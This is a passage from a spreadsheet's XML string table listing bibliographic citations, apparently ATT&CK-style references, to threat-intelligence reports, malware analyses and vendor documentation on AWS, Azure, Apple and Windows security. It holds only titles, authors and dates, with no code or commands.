    <t>Amazon. (n.d.). Security groups for your VPC. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.</t>
  </si>
  <si>
    <t>UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.</t>
  </si>
  <si>
    <t>Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018.</t>
  </si>
  <si>
    <t>Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.</t>
  </si>
  <si>
    <t>Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.</t>
  </si>
  <si>
    <t>Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.</t>
  </si>
  <si>
    <t>Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.</t>
  </si>
  <si>
    <t>Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, July 15). It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>kaloprominat. (2013, July 30). macos: manage add list remove login items apple script. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.</t>
  </si>
  <si>
    <t>Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz &amp; Command Reference. Retrieved December 23, 2015.</t>
  </si>
  <si>
    <t>Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>Tinaztepe,  E. (n.d.). The Adventures of a Keystroke:  An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.</t>
  </si>
  <si>
    <t>AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group,  a subgroup of the Lazarus. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Perigaud, F. (2015, December 15). Newcomers in the Derusbi family. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.</t>
  </si>
  <si>
    <t>Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019.</t>
  </si>
  <si>
    <t>Noteworthy. (2019, January 6). Al-Khaser. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual &amp; physical tools used by white/black hat hackers. Retrieved March 30, 2018.</t>
  </si>
  <si>
    <t>Blasco, J. (2011, December 12). Another Sykipot sample likely targeting US federal agencies. Retrieved March 28, 2016.</t>
  </si>
  <si>
    <t>Blasco, J. (2012, January 12). Sykipot variant hijacks DOD and Windows smart cards. Retrieved January 10, 2016.</t>
  </si>
  <si>
    <t>Alintanahin, K. (2014, March 13). Kunming Attack Leads to Gh0st RAT Variant. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.</t>
  </si>
  <si>
    <t>Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Temporary Security Credentials. Retrieved October 18, 2019.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Amazon Machine Images (AMI). Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Start Building on AWS Today. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>MacCarthaigh, C. (2019, November 19). Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service. Retrieved October 14, 2020.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). IAM user groups. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Amazon S3. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Amazon. (n.d.). Amazon EBS snapshots. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.</t>
  </si>
  <si>
    <t>Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>Amplia Security. (n.d.). Windows Credentials Editor (WCE) F.A.Q.. Retrieved December 17, 2015.</t>
  </si>
  <si>
    <t>Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Shelmire, A. (2015, July 06). Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels. Retrieved November 15, 2018.</t>
  </si>
  <si>
    <t>Anomali Labs. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved March 4, 2019.</t>
  </si>
  <si>
    <t>Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.</t>
  </si>
  <si>
    <t>Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020.</t>
  </si>
  <si>
    <t>Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.</t>
  </si>
  <si>
    <t>Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.</t>
  </si>
  <si>
    <t>Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.</t>
  </si>
  <si>
    <t>Andy. (2018, May 12). ‘Anonymous’ Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.</t>
  </si>
  <si>
    <t>Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel's infiltration and isolation network. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.</t>
  </si>
  <si>
    <t>Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>Apple Inc. (2021, February 18). App security overview. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Core Services. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem?. Retrieved August 3, 2022.</t>
  </si>
  <si>
    <t>Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>Apple. (2016, September 13). Daemons and Services Programming Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021.</t>
  </si>
  <si>
    <t>Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>Apple Inc.. (2021, January 1). Hardened Runtime: Manage security protections and resource access for your macOS apps.. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.</t>
  </si>
  <si>
    <t>Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020.</t>
  </si>
  <si>
    <t>Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021.</t>
  </si>
  <si>
    <t>Apple. (2018, April 19). Technical Note TN2459: User-Approved Kernel Extension Loading. Retrieved June 30, 2020.</t>
  </si>
  <si>
    <t>Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.</t>
  </si>
  <si>
    <t>Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.</t>
  </si>
  <si>
    <t>Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.</t>
  </si>
  <si>
    <t>Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.</t>
  </si>
  <si>
    <t>Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.</t>
  </si>
  <si>
    <t>Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.</t>
  </si>
  <si>
    <t>ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.</t>
  </si>
  <si>
    <t>Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.</t>
  </si>
  <si>
    <t>Goodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Goodin, D. &amp; Salter, J. (2020, August 6). More than 20GB of Intel source code and proprietary data dumped online. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Yuste, J. Pastrana, S. (2021, February 9). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved August 19, 2021.</t>
  </si>
  <si>
    <t>Atlas Cybersecurity. (2021, April 19). Threat Actors use Search-Engine-Optimization Tactics to Redirect Traffic and Install Malware. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.</t>
  </si>
  <si>
    <t>Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.</t>
  </si>
  <si>
    <t>Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.</t>
  </si>
  <si>
    <t>Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.</t>
  </si>
  <si>
    <t>Auth0. (n.d.). Access Tokens. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021.</t>
  </si>
  <si>
    <t>Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.</t>
  </si>
  <si>
    <t>Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.</t>
  </si>
  <si>
    <t>Hamzeloofard, S. (2020, January 31). New wave of PlugX targets Hong Kong | Avira Blog. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Gahlot, A. (n.d.). Threat Hunting for Avaddon Ransomware. Retrieved August 19, 2021.</t>
  </si>
  <si>
    <t>Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command &amp; Control in the Cloud. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Alexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor. Retrieved May 1, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2022, August 26). Use Azure AD access reviews to manage users excluded from Conditional Access policies. Retrieved August 30, 2022.</t>
  </si>
  <si>
    <t>Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa.. (2017, November 16). Security vulnerability in Azure AD &amp; Office 365 identity federation. Retrieved February 1, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2022, September 20). Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials. Retrieved September 28, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved February 1, 2022.</t>
  </si>
  <si>
    <t>Sean Metcalf. (2020, May 27). From Azure AD to Active Directory (via Azure) – An Unanticipated Attack Path. Retrieved September 28, 2022.</t>
  </si>
  <si>
    <t>Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.</t>
  </si>
  <si>
    <t>Microsoft Azure. (2021, December 29). Blob snapshots. Retrieved March 2, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Azure products. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Delegate access with a shared access signature. (2019, December 18). Delegate access with a shared access signature. Retrieved March 2, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.</t>
  </si>
  <si>
    <t>BBC. (2022, April 1). LAPSUS: Two UK Teenagers Charged with Hacking for Gang. Retrieved June 9, 2022.</t>
  </si>
  <si>
    <t>Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>Galperin, E., Et al.. (2016, August 4). When Governments Attack: State Sponsored Malware Attacks Against Activists, Lawyers, and Journalists. Retrieved May 23, 2018.</t>
  </si>
  <si>
    <t>BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking &amp; Loading Techniques. Retrieved August 10, 2020.</t>
  </si>
  <si>
    <t>BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.</t>
  </si>
  <si>
    <t>French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger Than Its Weakest LNK. Retrieved November 30, 2020.</t>
  </si>
  <si>
    <t>Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named BUGJUICE by FireEye is likely the same as the malware RedLeaves. (Citation: FireEye APT10 April 2017) (Citation: Twitter Nick Carr APT10)</t>
  </si>
  <si>
    <t>Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Duncan, I., Campbell, C. (2019, May 7). Baltimore city government computer network hit by ransomware attack. Retrieved July 29, 2019.</t>
  </si>
  <si>
    <t>Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.</t>
  </si>
  <si>
    <t>Baumgartner, K., Golovkin, M.. (2015, May 14). The Naikon APT. Retrieved January 14, 2015.</t>
  </si>
  <si>
    <t>Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.</t>
  </si>
  <si>
    <t>Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.</t>
  </si>
  <si>
    <t>Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Berkeley Security, University of California. (n.d.). Securing Remote Desktop for System Administrators. Retrieved November 4, 2014.</t>
  </si>
  <si>
    <t>BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker’s toolkit. Retrieved February 2, 2022.</t>
  </si>
  <si>
    <t>Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.</t>
  </si>
  <si>
    <t>Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.</t>
  </si>
  <si>
    <t>Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.</t>
  </si>
  <si>
    <t>Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.</t>
  </si>
  <si>
    <t>Arsene, L. (2020, April 21). Oil &amp; Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020.</t>
  </si>
  <si>
    <t>Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021.</t>
  </si>
  <si>
    <t>Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.</t>
  </si>
  <si>
    <t>Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.</t>
  </si>
  <si>
    <t>Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.</t>
  </si>
  <si>
    <t>Liviu Arsene, Radu Tudorica. (2020, November 23). TrickBot is Dead. Long Live TrickBot!. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Tudorica, R., Maximciuc, A., Vatamanu, C. (2020, March 18). New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong. Retrieved March 15, 2021.</t>
  </si>
  <si>
    <t>Radu Tudorica. (2021, July 12). A Fresh Look at Trickbot’s Ever-Improving VNC Module. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. Retrieved September 29, 2015.</t>
  </si>
  <si>
    <t>Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.</t>
  </si>
  <si>
    <t>Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.</t>
  </si>
  <si>
    <t>The BlackBerry Research &amp; Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.</t>
  </si>
  <si>
    <t>The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.</t>
  </si>
  <si>
    <t>Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.</t>
  </si>
  <si>
    <t>Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Liberman, T. &amp; Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved March 6, 2017.</t>
  </si>
  <si>
    <t>Thyer, J. (2015, October 30). Password Spraying &amp; Other Fun with RPCCLIENT. Retrieved April 25, 2017.</t>
  </si>
  <si>
    <t>Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.</t>
  </si>
  <si>
    <t>Blasco, J. (2013, March 21). New Sykipot developments &amp;#91;Blog&amp;#93;. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.</t>
  </si>
  <si>
    <t>I. Ilascu. (2019, March 3). Op 'Sharpshooter' Connected to North Korea's Lazarus Group. Retrieved September 26, 2022.</t>
  </si>
  <si>
    <t>Gatlan, S. (2019, July 3). New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS. Retrieved March 15, 2020.</t>
  </si>
  <si>
    <t>Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.</t>
  </si>
  <si>
    <t>Cimpanu, C.. (2017, March 29). Russian Hacker Pleads Guilty for Role in Infamous Linux Ebury Malware. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020.</t>
  </si>
  <si>
    <t>Abrams, L. (2021, March 19). REvil ransomware has a new ‘Windows Safe Mode’ encryption mode. Retrieved June 23, 2021.</t>
  </si>
  <si>
    <t>Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.</t>
  </si>
  <si>
    <t>Abrams, L. (2020, October 23). New RAT malware gets commands via Discord, has ransomware feature. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Bloxham, B. (n.d.). Getting Windows to Play with Itself &amp;#91;PowerPoint slides&amp;#93;. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.</t>
  </si>
  <si>
    <t>Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.</t>
  </si>
  <si>
    <t>Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from a Botnet. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020.</t>
  </si>
  <si>
    <t>Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Holland, A. (2019, March 7). Tricks and COMfoolery: How Ursnif Evades Detection. Retrieved June 10, 2019.</t>
  </si>
  <si>
    <t>Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>CERN. (2019, June 4). 2019/06/04 Advisory: Windigo attacks. Retrieved February 10, 2021.</t>
  </si>
  <si>
    <t>CERT-EE. (2021, January 27). Gamaredon Infection: From Dropper to Entry. Retrieved February 17, 2022.</t>
  </si>
  <si>
    <t>Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019.</t>
  </si>
  <si>
    <t>Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.</t>
  </si>
  <si>
    <t>CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021.</t>
  </si>
  <si>
    <t>CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019.</t>
  </si>
  <si>
    <t>CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.</t>
  </si>
  <si>
    <t>DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.</t>
  </si>
  <si>
    <t>CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.</t>
  </si>
  <si>
